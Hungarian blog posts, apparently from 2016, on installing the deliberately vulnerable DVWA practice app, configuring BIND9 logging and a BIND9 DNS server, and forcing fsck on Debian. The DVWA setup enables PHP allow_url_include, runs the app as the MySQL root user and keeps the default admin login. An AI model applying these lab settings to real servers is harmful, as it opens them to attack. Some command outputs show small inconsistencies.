A mysql szerver root jelszavát jegyezzük meg mert majd be kell állítani a DVWA config fájljába.

Ellenőrizzük a DVWA weboldalán (link), hogy mi a legfrissebb verzió (jelen esetben ez a v1.9) és töltsük le.

# wget https://github.com/RandomStorm/DVWA/archive/v1.9.zip
--2016-03-13 10:46:09--  https://github.com/RandomStorm/DVWA/archive/v1.9.zip
github.com (github.com) feloldása… 192.30.252.131
Csatlakozás a következőhöz: github.com (github.com)[192.30.252.131]:443… kapcsolódva.
...
HTTP kérés elküldve, várakozás válaszra… 200 OK
Hossz: 1311427 (1,2M) [application/zip]
Mentés ide: „v1.9.zip”

v1.9.zip            100%[=====================>]   1,25M  1,26MB/s  idő 1,0s   

2016-03-13 10:46:11 (1,26 MB/s) -- „v1.9.zip” mentve [1311427/1311427]

Csomagoljuk ki.

# unzip v1.9.zip
Archive:  v1.9.zip
3cd38c444249e3a016fc203c79ecb68052283f54
   creating: DVWA-1.9/
  inflating: DVWA-1.9/.htaccess      
  inflating: DVWA-1.9/CHANGELOG.md   
...
  inflating: DVWA-1.9/vulnerabilities/xss_s/source/low.php  
  inflating: DVWA-1.9/vulnerabilities/xss_s/source/medium.php

Ellenőrizzük a telepített apache webszerver tufását. Ehhez elég ha beírjuk a böngészőnkbe a virtuális gépünk IP címét, ami nekem ez jelen esetben 192.168.10.200

Ha az Apache2 szerver alap képernyőjét látjuk, akkor eddig minden rendben. Most helyezzük át a kicsomagolt telepítőt a webszerver dokumentum könyvtárába, ami alapesetben a /var/www/html/ mappa.

# mv DVWA-1.9/* /var/www/html/

Állítsuk át az áthelyezett fájlok tulajdonosát www-data-ra, majd indítsuk újra a webszervert.

# chown -R www-data. /var/www/html/*
# systemctl restart apache2

A böngészőbe nézzük meg a http://192.168.10.200/setup.php oldalt.

Láthatjuk, hogy az oldalon pirossal van jelezve pár hiányzó beállítás. Vegyük ezeket sorra.

PHP function display_errors: Disabled - Ez ugyan nem piros, de ha a /etc/php5/apache2/php.ini-ben a display_errors-t On-ra állítjuk, akkor túl könnyű dolgunk lenne a gyakorlások során, tehát ez Off vagyis Disabled marad.
PHP function allow_url_include: Disabled - A /etc/php5/apache2/php.ini-ben az allow_url_include értéket állítsuk On-ra.
PHP module php-gd: Missing - A php-gd modult telepíteni kell.

# apt-get install php5-gd

reCAPTCHA key: Missing - Ehhez kell készíteni egy kulcsot a https://www.google.com/recaptcha/admin/create oldalon

Ha ezek megvannak, akkor a DVWA konfigurációs fájljába adjuk meg a mysql root jelszavát és a reCAPTCHA kulcsokat.

# nano /var/www/html/config/config.inc.php
...
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = 'jelszó';
...
$_DVWA[ 'recaptcha_public_key' ]  = 'publikus kulcs';
$_DVWA[ 'recaptcha_private_key' ] = 'privát kulcs';
...

Ezek után nincs más hátra mint a webszerver újraindítása. Ha mindent jól csináltunk, akkor az oldalon már nem lehet pirossal jelölt rész. Az utolsó lépés, az oldal alján levő Create / Reset Database gomb megnyomása.

Az adatbázis elkészült és pár másodperc múlva automatán betöltődik a belépési oldal.

Az alapértelmezett felhasználónév (admin) és jelszó (password) beütése után már is gyakorolhatunk.

Jó szórakozást!

BIND9 DNS szerver naplózás beállítása

Thu, 10 Mar 2016 19:28:38 +0100

A konfiguráció felépítése

A BIND9 DNS szerver alapól a /var/log/messages vagy a /var/log/system fájlba naplózik a syslogd beállítása szerint. Ha részletesebb és szeparáltabb naplózást szeretnénk, akkor először is meg kell ismerni a beállítás szintaktikáját. A BIND9 eléggé széleskörű és részletes naplózási beállítási lehetőségeket biztosít. Lássuk egy egyszerű naplózási beállítás felépítését. Hozzuk létre a /etc/bind/named.conf.log fájlt a következő tartalommal.

# nano /etc/bind/named.conf.log
logging {
        channel update_debug {
                file "/var/log/bind/update_debug.log" versions 3 size 100k;
                severity debug;
                print-severity  yes;
                print-time      yes;
        };
        channel security_info {
                file "/var/log/bind/security_info.log" versions 1 size 100k;
                severity info;
                print-severity  yes;
                print-time      yes;
        };
        channel bind_log {
                file "/var/log/bind/bind.log" versions 3 size 1m;
                severity info;
                print-category  yes;
                print-severity  yes;
                print-time      yes;
        };

        category default { bind_log; };
        category lame-servers { null; };
        category update { update_debug; };
        category update-security { update_debug; };
        category security { security_info; };
};

Nézzünk meg egy log fájl meghatározást részletesen.

...
        channel bind_log {
                file "/var/log/bind/bind.log" versions 3 size 1m;
                severity info;
                print-category  yes;
                print-severity  yes;
                print-time      yes;
        };
...
        category default { bind_log; };
...

A channel-el nevesítjük a log fájl definícióját, amire késöbb a category-nál hivatkozhatunk. Tehát a DNS szerver bind_log definíciója a /var/log/bind/bind.log fájlba mutat. A version 3 size 1m kifejezés írja le, hogy a naplóbejegyzés 1 megabyte méretű lehet. Amint meghaladja, akkor új fájlt nyit és a régiekből hármat tart meg visszamenőleg. Úgy működik mint a logrotáció csak nincs tömörítése. A severity határozza meg a fájlba kerülő naplóbejegyzés súlyosságát, amit már a syslog beállításokból ismerhetünk. A print-category, print-severity és print-time beállítás határozza meg mi szerepeljen még egy-egy sorban, vagyis a bejegyzés kategóriája, súlyossága és ideje. A category-val határozzuk meg, hogy a default napló bejegyzések kerülnek a bind_log névvel meghatározott fájlba az előzőkben megadott paraméterek szerint. A default, lame-servers, update, update-security és security mellett még jó pár kategória van amit bővebben a BIND9 dokumentációjából megtudhatunk.

Ellenőrizzük le az elkészült fájlt a named.checkconf utasítással.

# named-checkconf /etc/bind/named.conf.log

Ha nincs kimenete az ellenőrzésnek, akkor minden rendben. Most készítsük el a /var/log/bind mappát és benne a update_debug.log, security_info.log és a bind.log fájlokat, majd állítsuk be a jogosultságokat. Mivel a DNS szerverünk bind felhasználó jogosultságával fut, így a mappa és a naplófájlok tulajdonosa is ez lesz.

# mkdir /var/log/bind
# touch /var/log/bind/update_debug.log /var/log/bind/security_info.log /var/log/bind/bind.log
# chown -R bind. /var/log/bind

Ahhoz hogy a BIND9 használja az elkészült naplózási beállítást és log fájlokat, szúrjuk be a következő sort a named.conf.local konfigurációs fájl elejére.

# nano /etc/bind/named.conf.local
include "/etc/bind/named.conf.log";
...

Nincs más hátra mint a BIND9 DNS szerver újraindítása.

# systemctl restart bind9

És a futásának ellenőrzése.

# systemctl status bind9
● bind9.service - BIND Domain Name Server
   Loaded: loaded (/lib/systemd/system/bind9.service; enabled)
  Drop-In: /run/systemd/generator/bind9.service.d
           └─50-insserv.conf-$named.conf
   Active: active (running) since cs 2016-03-10 18:53:14 CET; 1h 2min ago
     Docs: man:named(8)
 Main PID: 371 (named)
   CGroup: /system.slice/bind9.service
           └─371 /usr/sbin/named -f -u bind
...

Ha megnézzük a /var/log/bind mappát, akkor láthatjuk, hogy a szerver szépen naplóz a megfelelő fájlokba.

# ls -l /var/log/bind/
összesen 20
-rw-r--r-- 1 bind bind 12621 márc  10 19:53 bind.log
-rw-r--r-- 1 bind bind    76 márc   7 20:45 security_info.log
-rw-r--r-- 1 bind bind     0 márc   7 20:37 update_debug.log

Lemez ellenőrzés kikényszerítése a következő induláskor

Sun, 06 Mar 2016 17:00:15 +0100

A felcsatolt lemezeket menet közben csak read-only módban tudjuk ellenőrizni és ha javítás szükséges, akkor ahhoz le kell csatolni őket (umount). Ez nem minden esetben megoldható, például a root partíció, illetve azok a lemezek, amelyeket a rajta lévő adatok folyamatos kiszolgálása végett a futó szolgáltatásoknak el kell érniük. Ha a tervezett újraindításnál azt szeretnénk, hogy a rendszer automatán lefuttasson egy lemez ellenőrzést a felcsatolás előtt, akkor a következő beállításokkal ezt kikényszeríthetjük Debian alapú disztribúciók esetében.

SysVinit

Nyissuk meg a /etc/default/rcS fájlt és az alapértelmezett FSCKFIX=no opciót állítsuk át yes-re.

# nano /etc/default/rcS
...
FSCKFIX=yes
...

Ezután hozzunk létre egy üres forcefsck nevű fájlt a főgyökérben.

# touch /forcefsck

Így a következő újraindulásnál automatán lefut a lemez ellenőrzés.

Systemd

Az új Systemd rendszereknél viszont ez a megoldás nem működik. A tune2fs parancs megmutatja, hogy az adott partíción mennyi felcsatolás után fog induláskor lefutni a lemez ellenőrzés.

# tune2fs -l /dev/sda1
...
Maximum mount count:      -1
Last checked:             Sun Feb 26 13:22:21 2016
...

Látható hogy a Maximum mount count értéke -1, vagyis sose fogja induláskor ellenőrizni a /dev/sda1 partíciót, az utolsó pedig 2016.02.26. 13:22:21-kor volt. Ha azt szeretnénk, hogy a következő ujraindításkor a /dev/sda1 root partíción a felcsatolás elött lefusson egy fsck, akkor ezt szintén a tune2fs paranccsal beállíthatjuk.

# tune2fs -c 1 /dev/sda1

A tune2fs -l /dev/sda1 ismételt futtatásánál már látszik hogy a Maximum count értéke 1, vagyis a következő rendszer indításnál lesz lemez ellenőrzés az adott partíción.

# tune2fs -l /dev/sda1
...
Maximum mount count:      1
Last checked:             Sun Feb 26 13:22:21 2016
...

Az újraindulás után a tune2fs -l /dev/sda1 kimenetén már látszik, hogy az utolsó ellenőrzés ideje aktualizálódott, az lefutott. Az eredményét megnézhetjük /run/initramfs/fsck.log fájlban.

# cat /run/initramfs/fsck.log 
Log of fsck -a -t ext4 /dev/sda1 
Sun Mar  6 16:55:46 2016

fsck from util-linux 2.25.2
/dev/sda1: clean, 24948/122400 files, 200127/488960 blocks

Sun Mar  6 16:55:46 2016
----------------

Ha ez meg volt, akkor ugyan így vissza is állíthatjuk az értéket -1-re, vagy ha szeretnénk, akkor beállíthatunk egy csatolási számot és ennyi felcsatolás után automatán lefut az ellenőrzés újrainduláskor.

# tune2fs -c 20 /dev/sda1

Húsz felcsatolás után lefut.

# tune2fs -c -1 /dev/sda1

-1 vagy 0 esetén pedig sose fog lefutni.

BIND9 DNS szerver telepítés Debian-ra

Mon, 29 Feb 2016 22:17:19 +0100

A DNS szerver szerepe

Az internet IP (internet protokoll) alapú világméretű hálózat. Minden hálózatra kötött eszköznek van egy IP címe (egyedi azonosító) és az eszközök ez alapján kommunikálnak egymással. Az internet protokoll egy szám, ami IPv4 esetén négy bájt (szám 0-255-ig) ponttal elválasztva, például 74.125.136.100 . Persze ahhoz, hogy egyszerűbb legyen az életünk és a web böngészőbe ne hasonló számokat keljen beírogatni, kitalálták, hogy a számokat egyedi nevekkel lehessen helyettesíteni. Ezek lettek a domain nevek. Tehát amikor a böngészőbe beírjuk, hogy 74.125.136.100 akkor ugyanúgy a népszerű kereső oldalra jutunk, mintha azt írtuk volna, hogy google.com . De honnan tudja böngésző, hogy a beírt névhez milyen IP cím tartozik. És itt jön a lényeg. Az IP címek, nevekkel történő megfeleltetéséért a DNS szerverek felelősek. Amikor a böngészőbe beírjuk, hogy “google.com”, akkor a számítógép megkérdezi a DNS szervert, hogy “Ugyan mond már meg hogy milyen IP cím tartozik ehhez a domain névhez!”. A DNS szerver pedig küldi a választ, hogy “74.125.136.100”. Ezzel a böngésző már tud valamit kezdeni és meg fogja tudni jeleníteni az adott IP címen lévő web oldalt…

A feladat tehát adott, a virtuális teszt környezetünkbe telepítünk egy BIND9 DNS szervert. A környezet a következő nevekből és IP címekből fog állni, a DNS szervernek ezeket kell majd feloldania:

dns.debian.lnx - 192.168.10.10 - ez maga a DNS szerver
host.debian.lnx - 192.168.10.100 - egy host gép
gateway.debian.lnx - 192.168.10.254 - egy gateway gép ami az átjárást biztosítja a szeparált virtuális hálózat és a lan között.

A BIND9 telepítése

Parancssorban root felhasználóként telepítsük a bind9 csomagot.

# apt-get install bind9

Miután feltelepült, a szolgáltatás egyből fut, ellenőrizzük.

# systemctl status bind9
● bind9.service - BIND Domain Name Server
   Loaded: loaded (/lib/systemd/system/bind9.service; enabled)
  Drop-In: /run/systemd/generator/bind9.service.d
           └─50-insserv.conf-$named.conf
   Active: active (running) since k 2016-03-01 20:12:43 CET; 22min ago
     Docs: man:named(8)
 Main PID: 375 (named)
   CGroup: /system.slice/bind9.service
           └─375 /usr/sbin/named -f -u bind
...

Először állítsuk be a forwarders opciót. Ez teszi lehetővé, hogy ha olyan DNS kérés érkezik a kiszolgálóhoz, amit nem tud feloldani, akkor a kérést továbbítja egy megadott másik DNS szerverhez feloldásra. A következő fontos beállítás, az allow-query. Ez mondja meg a DNS szervernek, hogy mely tartományoktól fogadhat csak el DNS lekérdezéseket. Nyissuk meg hát a named.conf.options fájlt és állítsuk be ezeket.

# nano named.conf.options
...
	forwarders {
		8.8.8.8;
	};
	allow-query { 192.168.10.0/24; 127.0.0.1; };
...

A forwardersnél megadhatjuk a szolgáltatónk, a google publikus vagy bármely a hálózatban elérhető DNS szerver címét.

A következő feladat, hogy a named.conf.local fájlba felvesszük a debian.lnx tartományunkat.

# nano named.conf.local
zone "debian.lnx" {
        type master;
        file "/etc/bind/db.debian.lnx";
};

zone "10.168.192.in-addr.arpa" {
        type master;
        file "/etc/bind/db.192";
};

Ügyeljünk a sorvégi és a kapcsos zárójelek végén levő pontos vesszőkre. Most csináljunk egy másolatot a db.empty fájlból db.debian.lnx néven. Majd a localhost-ot cseréljük debian.lnx-re.

# cp db.empty db.debian.lnx
# sed -i s/localhost/debian\.lnx/g db.debian.lnx

Az utolsó sorban az NS rekordot javítsuk ki dns.debian.lnx-re és vegyük fel a többi nevet és címet.

# nano db.debian.lnx
...
@	IN	NS	dns.debian.lnx.
dns	IN	A	192.168.10.10
host	IN	A	192.168.10.100
gateway	IN	A	192.168.10.254

A reverse fájlal, vagyis a db.192-vel járjunk el hasonlóan.

# cp db.empty db.192
# sed -i s/localhost/debian\.lnx/g db.192

Az utolsó sorban itt is javítsuk az NS rekordot és vegyük fel a többi gép reverse (PTR) címét.

# nano db.192
...
@	IN	NS	dns.debian.lnx.
10	IN	PTR	dns.debian.lnx.
100	IN	PTR	host.debian.lnx.
254	IN	PTR	gateway.debian.lnx.

Ha változtatunk a zóna fájl (esetünkben db.debian.lnx, db.192) tartalmán, akkor a benne lévő Serial opción növelni kell hogy a DNS szerver reload után életbelépjenek azok. Újraindítás (restart) esetén újratölti a zóna fájlokat, de reload esetén ha a Serial nem változik, akkor nem. A Serial tartalmát csak simán növelhetjük, de a bevett szokás, hogy a módosítás dátumát irjuk ide hozzátéve egy két jegyű számot a végére, jelezvén a napon belüli esetleges változások számát pl. 2016022901.

# cat /etc/bind/db.debian.lnx 
$TTL	604800
@	IN	SOA	debian.lnx. root.debian.lnx. (
			2016022901	; Serial
			 604800		; Refresh
			  86400		; Retry
			2419200		; Expire
			 604800 )	; Negative Cache TTL
;
@	IN	NS	dns.debian.lnx.
dns	IN	A	192.168.10.10
host	IN	A	192.168.10.100
gateway	IN	A	192.168.10.254

# cat /etc/bind/db.192
$TTL	604800
@	IN	SOA	debian.lnx. root.debian.lnx. (
			2016022901	; Serial
			 604800		; Refresh
			  86400		; Retry
			2419200		; Expire
			 604800 )	; Negative Cache TTL
;
@	IN	NS	dns.debian.lnx.
10	IN	PTR	debian.lnx.
100	IN	PTR	host.debian.lnx.
254	IN	PTR	gateway.debian.lnx.

Mielött ujratöltjük a DNS szerver konfigokat, ellenőrizzük azokat.

# named-checkconf /etc/bind/named.conf.local 
# named-checkconf /etc/bind/named.conf.options

Ha nem ad vissza semmit, akkor nincs benne hiba. Most a zone fájlok ellenörzése következik.

# named-checkzone debian.lnx db.debian.lnx 
zone debian.lnx/IN: loaded serial 2016022903
OK

# named-checkzone 10.168.190.in-addr.arpa db.192
zone 10.168.190.in-addr.arpa/IN: loaded serial 2016022901
OK

Úgy néz ki, hogy szintaktikailag minden rendben. Nincs más hátra, mint a DNS szerver konfigurációk újratöltése.

# systemctl reload bind9

A host és a gateway gépre belépve, állítsuk be a /etc/resolv.conf-ba, hogy az új DNS szerver legyen használva.

# nano /etc/resolv.conf
nameserver 192.168.10.10

Ha ez meg van akkor ellenőrizzük, hogy az új DNS szerver feloldja-e az gépneveket.

# nslookup gateway.debian.lnx
Server:		192.168.10.10
Address:	192.168.10.10#53

Name:	gateway.debian.lnx
Address: 192.168.10.254

# nslookup host.debian.lnx
Server:		192.168.10.10
Address:	192.168.10.10#53

Name:	host.debian.lnx
Address: 192.168.10.100

# nslookup dns.debian.lnx
Server:		192.168.10.10
Address:	192.168.10.10#53

Name:	dns.debian.lnx
Address: 192.168.10.10

Most nézzünk egy olyan címet, amit biztosan nem tud helyben feloldani és egy másik DNS szerverhez kell fordulnia. Kérjük meg dig utasítással a szerverünket, hogy oldja fel a www.index.hu domain nevet.

# dig @192.168.10.10 www.index.hu

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> @192.168.10.10 www.index.hu
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11439
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 13, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.index.hu.			IN	A

;; ANSWER SECTION:
www.index.hu.		89	IN	A	217.20.130.99

;; AUTHORITY SECTION:
.			11755	IN	NS	c.root-servers.net.
.			11755	IN	NS	d.root-servers.net.
.			11755	IN	NS	g.root-servers.net.
.			11755	IN	NS	h.root-servers.net.
.			11755	IN	NS	m.root-servers.net.
.			11755	IN	NS	j.root-servers.net.
.			11755	IN	NS	l.root-servers.net.
.			11755	IN	NS	f.root-servers.net.
.			11755	IN	NS	k.root-servers.net.
.			11755	IN	NS	a.root-servers.net.
.			11755	IN	NS	b.root-servers.net.
.			11755	IN	NS	e.root-servers.net.
.			11755	IN	NS	i.root-servers.net.

;; Query time: 203 msec
;; SERVER: 192.168.10.10#53(192.168.10.10)
;; WHEN: Thu Mar 03 20:39:07 CET 2016
;; MSG SIZE  rcvd: 268

Látható, hogy minden további nélkül feloldotta, vagyis a forwarders opció működik. Ha most még egyszer lekérjük ugyanezt, akkor a válasz végén levő statisztikából kiderül, hogy már nem fordul a másik DNS szerverhez, hanem cache-böl válaszol rá, amit láthatunk a Query time különbségéből.

# dig @192.168.10.10 www.index.hu
; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> @192.168.10.10 www.index.hu
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23696
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 13, ADDITIONAL: 1
...

...
;; Query time: 31 msec
;; SERVER: 192.168.10.10#53(192.168.10.10)
;; WHEN: Thu Mar 03 20:44:37 CET 2016
;; MSG SIZE  rcvd: 268

Így már csak 31 msec a válasz idő az elöbbi 203-al szemben.

Ez már elég, ahhoz hogy a BIND9 DNS szerver alapszinten működjön. A késöbbiek folyamán majd leírom, a DNS szerverünk kiegészítését egy slave DNS szerverrel, ahova autómatán szinkronizálódnak majd a zóna változások és a fő DNS szerver kiesése esetén tökéletesen működik, mint tartalék DNS szerver.